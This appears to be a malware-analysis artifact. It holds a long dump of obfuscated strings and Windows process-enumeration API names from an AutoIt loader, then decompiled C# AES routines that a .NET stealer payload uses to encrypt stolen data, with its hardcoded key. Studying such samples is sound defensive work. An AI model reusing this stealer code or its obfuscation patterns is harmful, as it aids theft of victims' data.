hwy=Bucks=Deposits=Corporation=
EXPENSES*PERMITTED*DAKOTA*
rUhumQSA
XKqBRVpllQ
fujitsu^nr^bracelet^brass^
42
VirtualAlloc
ulong_ptr
kenny/Mailing/Pf/
dame*Monitored*Investigations*Liability*
JlpgklkJrnUDYd
participant!Pregnant!Farmers!
DriveGetSerial('FuMLU')
Empire#Bubble#Argue#Alike#Unexpected#
WinGetPos('valentine exact mars pierce ')
WinGetPos('Arrival=Iso=Surrey=')
StringIsFloat('pPRawNAP')
WinGetPos('Focal    Ht    Yukon    Coaching    Soul    ')
neNZEGNa
pCWtbMfMPmbr
tKkyKwCm
Centuries#Use#Drug#Query#
insurance-Vacuum-Ministry-Consensus-Northwest-
Pat=Restore=Map=Threads=
WinGetPos('MECHANISM    SENSITIVITY    MARKETING    PSP    BRIGHT    ')
ozIYVaLkNlptzCuhTLR
byte[272]
DriveGetSerial('BDNuPlEvUtAR')
StringIsFloat('rCretNRcjvV')
DriveGetSerial('gdArNpZbXxwTpm')
TKLLzfEt
MKbAlUbgEwKtIOknKiK
SUuNZqV
LION+JOAN+
CallWindowProc
TTFAPJRrL
BjOUEvNcSYFFmtAPaKE
paCBRrG
StringIsFloat('RzXpuAtIFvGByQ')
your!Dressed!Arrange!Away!Light!
HWnd('Technical    Talks    Renaissance    Programs    ')
NuuHsrFoDbFFpYTPxQ
yjqctBwqkxKP
OWwsemMQyZvprcV
HERSELF=API=IDENTIFICATION=
Baghdad=Spain=Away=Grade=
guilty#coupon#outlet#adrian#signed#
WXzVHoNajMuPIIAxEyuhrWcANk
linda^composition^
HWnd('SIMPLE!HANS!JULIAN!SPAM!')
21
zjsQLVT
99
WinGetPos('EXPLAINED    MILE    OAKS    ')
WinGetPos('Avi=Surname=Tie=March=Cartoon=')
OjlrYoaAYn
Mapping^Achieving^Comm^
Pursue#Bouquet#
WinGetPos('VARIABLES DEVELOPMENTS DISPOSITION PROTECTED PROCESS ')
BVUmItajHJNpiYZHGyFFnTgYCntPp
Rtojlztnh
WinGetPos('SERUM    BRIEFS    SEAT    PEAK    ')
Sqrt(61381)
DriveGetSerial('CshwqfQlBL')
cube!trinidad!
QBqJzFolQzhGRAyeEfUyPDGWMh
Sqrt(48609)
WinGetPos('tags#Cakes#Creative#Verify#')
POOL-ROUGHLY-ENG-MINES-
EHhFXq
NRLMQYGWpLyeHw
ihENXCkSVv
Sqrt(31134)
gym^assistance^advocate^serial^american^
StringIsFloat('JzxtKYfZsCv')
sure-jets-requests-
DriveGetSerial('gknpXvudfFSQhvg')
FcjaENeYeIwkSAdFUd
agreement-worcester-
DriveGetSerial('NDRdQcwwIRCjBXSRr')
sdAEYjb
YsmDdEOOO
WinGetPos('bill-fuzzy-aud-')
XbqA
DRxjOJTYwtcfZSvkSs
ROCHESTER+PATENT+BAGHDAD+LOTS+PENSION+
mjxYJSStTXxDhK
HWnd('yale@Compact@Descriptions@')
HWnd('Foul!Norway!')
DriveGetSerial('iZSCqszfVdHYD')
IMhabxLlKzRsE
naiLPIibd
wisconsin*phones*seat*
almost/Subjects/Besides/Sponsors/
Sqrt(51954)
QsDPGHdEBdtGddHmNXuz
aSDUrQglEMCyrAAryUigdLKQFYn
HWnd('williams!Compensation!Customs!Omega!')
xERYTqIpN
kfRZDLSzoF
Sqrt(8935)
slave=cursor=minus=advantage=name=
KdiZClFBXzTpxTfcgTKfTr
Sqrt(6554)
Hmv
COMPUTATIONAL+ZIMBABWE+PROVINCE+CLASSES+TEMPORARILY+
GjEaRj
yKFEKsTxMipKCIG
VeXuUNhBErilN
DriveGetSerial('XjpxxxFVR')
StringIsFloat('FMhhobhV')
Conflicts/Divorce/Exhibits/Cancellation/Integer/
CREATOR*PARENT*LANE*
FIWwXhE
aPlkYX
SSwklgYRC
StringIsFloat('dOmqDxpiSl')
AOCTWxKCbcbRTCCBSR
HWnd('Deficit*Assumptions*Registrar*')
StringIsFloat('FvQRBtnABrbU')
ypkEyxTHLJspL
minolta^paypal^insider^contributed^clay^
promotes fiction universe mount sex 
WinGetPos('puerto/roads/ignored/')
Sqrt(36086)
Sqrt(772)
GZAPvoPfSqsLm
Thought    Defeat    
152
WinGetPos('Johns#A#Issues#')
zvJCWjZ
continuing^acceptance^procurement^arlington^hi^
Demand-Salad-Character-Many-Apparatus-
vcu
uVTMsXaJZw
115
activation!Must!Strings!Fortune!
EMERALD=FIORICET=ATTRACTIONS=CONSIDER=EXAMINING=
183
Sqrt(48440)
Pharmacies+Geography+Criticism+Tommy+Boulevard+
HWnd('SPIN    CONSERVATION    CONJUNCTION    ')
dword Size;dword Usage;dword ProcessID;ulong_ptr DefaultHeapID;dword ModuleID;dword Threads;dword ParentProcessID;long PriClassBase;dword Flags;wchar ExeFile[260]
GOVERNOR=INTERIOR=BUCKS=RUGBY=REALTY=
INcKaH
RfrUyLdPElMeFfT
pIwxXByIB
WsX
CreateToolhelp32Snapshot
trinidad^nigeria^portsmouth^protein^
TRICKS=BEDROOMS=
Ref    Continued    Picks    Whore    Threshold    
52
WinGetPos('phrase^Edges^Allocated^Creator^Battle^')
DbRwVmGnBMwvx
WSPwxyP
WinGetPos('jeremy/Proceeding/Shadows/Dining/')
GLORY=DATABASES=IRAQI=VBULLETIN=IDEAS=
Sqrt(46354)
scores    Willow    Heavily    Generators    Alaska    
PGP!PICKS!ACADEMICS!ATI!
FUEL^LARGEST^
Saturday^Wa^Departure^Steal^
loans!buyers!syracuse!
dkGAgrEfa
HTPNPbalLDK
DRzQjcjpTT
szYlUidrqhXvVZubd
ANIMATED CELLULAR BREAKDOWN 
Process32FirstW
struct*
ProcessID
DriveGetSerial('QchNwqUefZtB')
VWmJCVjqc
GcuZCYhSK
OYlqNEBNNR
Sqrt(8323)
WinGetPos('sources=arts=occasional=plates=')
heater/Museum/Omaha/
\psapi.dll
GetModuleFileNameExW
ParentProcessID
WinGetPos('presence ran finished ')
segment#bill#sticker#
clinton/Virgin/Heights/Canal/
StringIsFloat('pjGklxsHMHGNJZ')
BBBVBlNA
quhkcxRUb
Sqrt(40532)
StringIsFloat('hMgNevczYP')
DriveGetSerial('gUBxhRKED')
pHzGWgKpSVAvMQSmbe
WinGetPos('messenger+Catherine+Monitors+')
Process32NextW
commodities=quiz=seq=notified=
WinGetPos('RENDERING^ALONE^SAFELY^REMAINED^SEEKS^')
con#throat#steel#shops#
PKrICLH
JzCCOArJkkW
jbOdLHHv
pledge^Pittsburgh^Jets^Commissions^Massachusetts^
Brought+Notified+
DRAWS LICENSE AMD 
Keeps^Distributed^Cut^
Specifications+Columbia+
cz*Wet*Sheep*Productions*
PSVlbtU
RjxgXUzocPyZzlytve
paACnHh
Discipline#Publisher#Crazy#Cet#
WinGetPos('lap senegal paint ')
DriveGetSerial('GAIeCTeHKMzBaK')
vXyxVAtiMtqWZ
gDGUKzckLH
DriveGetSerial('BZGDSGyvEKvKvpoa')
StringIsFloat('jcWLdzGvgTcqot')
CHANCE=TOUGH=TUNNEL=TRIUMPH=
VYpvkrJdg
CvuofNVSmSE
ZxHvtkGH
queue=miles=
uKxNuwZRtansvuVrJrEMCW
DriveGetSerial('WfcoujwMIUfEts')
miEYBy
Sign!Capable!Challenging!
ZwgUiYuSiPMhgnJzA
jXYbJO
DOgRPV
172
tUOYDssxTE
TDzzyYciagc
wt+profession+guide+
Sqrt(60541)
aFBaGtIF
gkZGoNreC
ILHpUkn
server=realize=fairly=
StringIsFloat('uHjValwAEFJ')
dexMrPDJDSZPFyV
monday+Negotiations+
PICHUNTER^BEDS^
WinGetPos('jelsoft#Began#')
uuSXyZjvBTUJYBV
HWnd('conflicts*Bb*')
mZE
HWnd('upgrading^trouble^rod^')
DriveGetSerial('iAbPHCW')
WiiJhUrWTntZqUDVY
xJuaYcGaQMSFte
Sqrt(59824)
Sqrt(2088)
Reduced@Purchases@Contribute@Lc@
Infant^Instruction^Hindu^Novelty^Sellers^
international/ft/grain/
JLgTqL
193
productivity#discover#when#faculty#
Associations#Oklahoma#Reaction#
OH-RELIEF-
DriveGetSerial('yfCrODyO')
StringIsFloat('BegMLqqikKbi')
pTQOEBhAfpcMgs
ba*Revisions*Viruses*
DriveGetSerial('RebjNNVIPEDWq')
Researchers    Til    Helping    Vhs    
Sqrt(41361)
StringIsFloat('uvXvhGyo')
DriveGetSerial('EjzjwipwTIdmtaFwt')
HWnd('XSaPSrRUlIIThEx')
LBS!SOMEBODY!VIOLATION!DIAL!BASIN!
HWnd('letting=ru=dr=co=seminar=')
DiuqxxXtpa
bZTUED
dgHbgAdJodphqh
GTudVHbraueDYm
Sqrt(38161)
australian-thinking-
Sqrt(538)
UstOOx
SScCNZbQVZgwPeLhV
KHDnFyzbGSdY
bnacKRhhmC
AFPvJdLHf
WSRJW
iJdaZvFda
HWnd('sydney!Runtime!May!Paperbacks!Extent!')
POSITIONING JAVASCRIPT VOTE CURRICULUM 
gpBJVBCWN
RNhzyIOVtKHXFxiiDY
fDIdBmfGiKkl

AES Encryption and Decryption logic for the stolen data, processed by the .NET Stealer payload of the AutoIT loader.
The key has been decrypted and inserted in the correct function.

using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;

// Token: 0x02000103 RID: 259
public class AesCrypto
{
	// Token: 0x17000082 RID: 130
	// (get) Token: 0x06000454 RID: 1108 RVA: 0x00004D02 File Offset: 0x00002F02
	// (set) Token: 0x06000455 RID: 1109 RVA: 0x00004D0A File Offset: 0x00002F0A
	public byte[] Key
	{
		get
		{
			return this._key;
		}
		set
		{
			this._key = value;
		}
	}

	// Token: 0x06000456 RID: 1110 RVA: 0x0002EC1C File Offset: 0x0002CE1C
	public byte[] Encrypt(byte[] byte_0)
	{
		byte[] array = new byte[16];
		RandomNumberGenerator.Create().GetBytes(array);
		byte[] array2;
		using (Aes aes = Aes.Create())
		{
			aes.Key = this.Key;
			aes.IV = array;
			using (ICryptoTransform cryptoTransform = aes.CreateEncryptor(this.Key, array))
			{
				using (MemoryStream memoryStream = new MemoryStream())
				{
					using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, CryptoStreamMode.Write))
					{
						cryptoStream.Write(byte_0, 0, byte_0.Length);
					}
					array2 = array.Concat(memoryStream.ToArray()).ToArray<byte>();
					<Module>.m = -814077312;
				}
			}
		}
		return array2;
	}

	// Token: 0x06000457 RID: 1111
	public byte[] Decrypt(byte[] byte_0)
	{
		byte[] array3;
		try
		{
			byte[] array = byte_0.Take(16).ToArray<byte>();
			using (Aes aes = Aes.Create())
			{
				aes.Key = this.Key;
				aes.IV = array;
				using (ICryptoTransform cryptoTransform = aes.CreateDecryptor(this.Key, array))
				{
					using (MemoryStream memoryStream = new MemoryStream(byte_0.Skip(16).ToArray<byte>()))
					{
						byte[] array2;
						int num;
						using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, CryptoStreamMode.Read))
						{
							array2 = new byte[byte_0.Skip(16).Count<byte>()];
							num = cryptoStream.Read(array2, 0, array2.Length);
						}
						array3 = array2.Take(num).ToArray<byte>();
					}
				}
			}
		}
		catch (Exception)
		{
			array3 = null;
		}
		return array3;
	}

	// Token: 0x06000458 RID: 1112 RVA: 0x0002EE14 File Offset: 0x0002D014
	public static byte[] InitKey()
	{
		byte[] array;
		try
		{
			array = Convert.FromBase64String("p8Ga5rmzt0SWaIMgO1D9P2eA/on1sj+MugV7SZOjq/c=");
		}
		catch
		{
			array = null;
		}
		return array;
	}

	// Token: 0x04000468 RID: 1128
	private byte[] _key;
}